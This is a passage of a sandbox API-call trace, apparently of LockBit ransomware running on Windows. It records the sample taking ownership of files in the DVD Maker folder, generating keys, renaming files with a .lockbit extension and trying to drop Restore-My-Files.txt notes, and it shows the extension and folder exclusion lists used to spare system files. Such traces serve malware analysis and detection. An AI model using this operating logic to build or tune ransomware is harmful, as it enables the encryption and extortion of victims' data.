0x0 [0076.690] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.690] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.690] RtlFreeAnsiString (AnsiString="\\") [0076.690] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x16c) returned 0x0 [0076.690] malloc (_Size=0x200) returned 0x77d800 [0076.690] NtQueryInformationToken (in: TokenHandle=0x16c, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.691] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.691] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.691] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\bod_r.TTF", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.691] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\bod_r.TTF", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.692] CloseHandle (hObject=0x16c) returned 1 [0076.692] free (_Block=0x77d800) [0076.692] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.692] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.692] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.692] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=77884) returned 1 [0076.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.693] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\bod_r.TTF.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\bod_r.TTF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.699] malloc (_Size=0x70) returned 0x77d800 [0076.699] NtSetInformationFile (FileHandle=0x16c, IoStatusBlock=0x3d6cf04, FileInformation=0x77d800, Length=0x70, FileInformationClass=0xa) returned 0x0 [0076.702] free (_Block=0x77d800) [0076.702] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\bod_r.TTF" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.703] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.703] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.703] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6725af0, ftCreationTime.dwHighDateTime=0x1d5641d, ftLastAccessTime.dwLowDateTime=0x90106780, ftLastAccessTime.dwHighDateTime=0x1d583ae, ftLastWriteTime.dwLowDateTime=0x90106780, ftLastWriteTime.dwHighDateTime=0x1d583ae, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ccv_server.exe", cAlternateFileName="CCV_SE~1.EXE")) returned 1 [0076.703] lstrcmpiW (lpString1=".", lpString2="ccv_server.exe") returned -1 [0076.703] lstrcmpiW (lpString1="..", lpString2="ccv_server.exe") returned -1 [0076.703] PathFindExtensionW (pszPath="ccv_server.exe") returned=".exe" [0076.703] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0076.703] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0076.703] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0076.703] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0ed7565, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="directshowtap.ax", cAlternateFileName="")) returned 1 [0076.703] lstrcmpiW (lpString1=".", lpString2="directshowtap.ax") returned -1 [0076.703] lstrcmpiW (lpString1="..", lpString2="directshowtap.ax") returned -1 [0076.703] PathFindExtensionW (pszPath="directshowtap.ax") returned=".ax" [0076.703] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0076.703] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0076.703] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0076.703] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0076.703] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0076.703] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0076.703] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0076.704] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0076.705] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="directshowtap.ax") returned 1 [0076.705] lstrcmpiW (lpString1="ntldr", lpString2="directshowtap.ax") returned 1 [0076.705] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="directshowtap.ax") returned 1 [0076.705] lstrcmpiW (lpString1="bootsect.bak", lpString2="directshowtap.ax") returned -1 [0076.705] lstrcmpiW (lpString1="autorun.inf", lpString2="directshowtap.ax") returned -1 [0076.705] lstrcmpiW (lpString1="thumbs.db", lpString2="directshowtap.ax") returned 1 [0076.705] lstrcmpiW (lpString1="iconcache.db", lpString2="directshowtap.ax") returned 1 [0076.705] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.705] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\directshowtap.ax") returned=".ax" [0076.705] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0076.706] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0076.706] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0076.707] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0076.707] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\directshowtap.ax.lockbit") returned 52 [0076.707] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.707] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.708] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.708] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.708] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.708] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.708] RtlFreeAnsiString (AnsiString="\\") [0076.708] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x16c) returned 0x0 [0076.708] malloc (_Size=0x200) returned 0x77d800 [0076.708] NtQueryInformationToken (in: TokenHandle=0x16c, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.708] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.708] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.708] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\directshowtap.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.709] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\directshowtap.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.709] CloseHandle (hObject=0x16c) returned 1 [0076.709] free (_Block=0x77d800) [0076.709] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.709] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.710] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.710] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=61440) returned 1 [0076.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.711] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\directshowtap.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\directshowtap.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.716] malloc (_Size=0x7e) returned 0x77de70 [0076.716] NtSetInformationFile (FileHandle=0x16c, IoStatusBlock=0x3d6cf04, FileInformation=0x77de70, Length=0x7e, FileInformationClass=0xa) returned 0x0 [0076.719] free (_Block=0x77de70) [0076.719] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\directshowtap.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.719] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.719] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.719] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ae6642, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc9ae6642, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xe1601f60, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x227600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVDMaker.exe", cAlternateFileName="")) returned 1 [0076.719] lstrcmpiW (lpString1=".", lpString2="DVDMaker.exe") returned -1 [0076.719] lstrcmpiW (lpString1="..", lpString2="DVDMaker.exe") returned -1 [0076.720] PathFindExtensionW (pszPath="DVDMaker.exe") returned=".exe" [0076.720] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0076.720] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0076.720] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0076.720] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0076.720] lstrcmpiW (lpString1=".", lpString2="en-US") returned -1 [0076.720] lstrcmpiW (lpString1="..", lpString2="en-US") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="$windows.~bt") returned 1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="intel") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="$windows.~ws") returned 1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="tor browser") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="google") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="application data") returned 1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="windows.old") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="Windows nt") returned -1 [0076.720] lstrcmpiW (lpString1="en-US", lpString2="Msbuild") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="Microsoft") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="All users") returned 1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="mozilla") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="Microsoft.NET") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="microsoft shared") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="Internet Explorer") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="common files") returned 1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="opera") returned -1 [0076.721] lstrcmpiW (lpString1="en-US", lpString2="Windows Journal") returned -1 [0076.721] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US") returned 33 [0076.721] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\*") returned 35 [0076.721] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0076.721] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.721] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.722] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.722] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.722] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x520150, dwReserved1=0x0, cFileName="DVDMaker.exe.mui", cAlternateFileName="")) returned 1 [0076.722] lstrcmpiW (lpString1=".", lpString2="DVDMaker.exe.mui") returned -1 [0076.722] lstrcmpiW (lpString1="..", lpString2="DVDMaker.exe.mui") returned -1 [0076.722] PathFindExtensionW (pszPath="DVDMaker.exe.mui") returned=".mui" [0076.722] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0076.722] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0076.722] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0076.722] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0076.722] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0076.722] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0076.722] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0076.722] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0076.723] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0076.723] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0076.724] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0076.724] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0076.724] lstrcmpiW (lpString1=".lockbit", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DVDMaker.exe.mui") returned 1 [0076.724] lstrcmpiW (lpString1="ntldr", lpString2="DVDMaker.exe.mui") returned 1 [0076.724] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DVDMaker.exe.mui") returned 1 [0076.724] lstrcmpiW (lpString1="bootsect.bak", lpString2="DVDMaker.exe.mui") returned -1 [0076.724] lstrcmpiW (lpString1="autorun.inf", lpString2="DVDMaker.exe.mui") returned -1 [0076.724] lstrcmpiW (lpString1="thumbs.db", lpString2="DVDMaker.exe.mui") returned 1 [0076.724] lstrcmpiW (lpString1="iconcache.db", lpString2="DVDMaker.exe.mui") returned 1 [0076.724] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\en-US" | out: 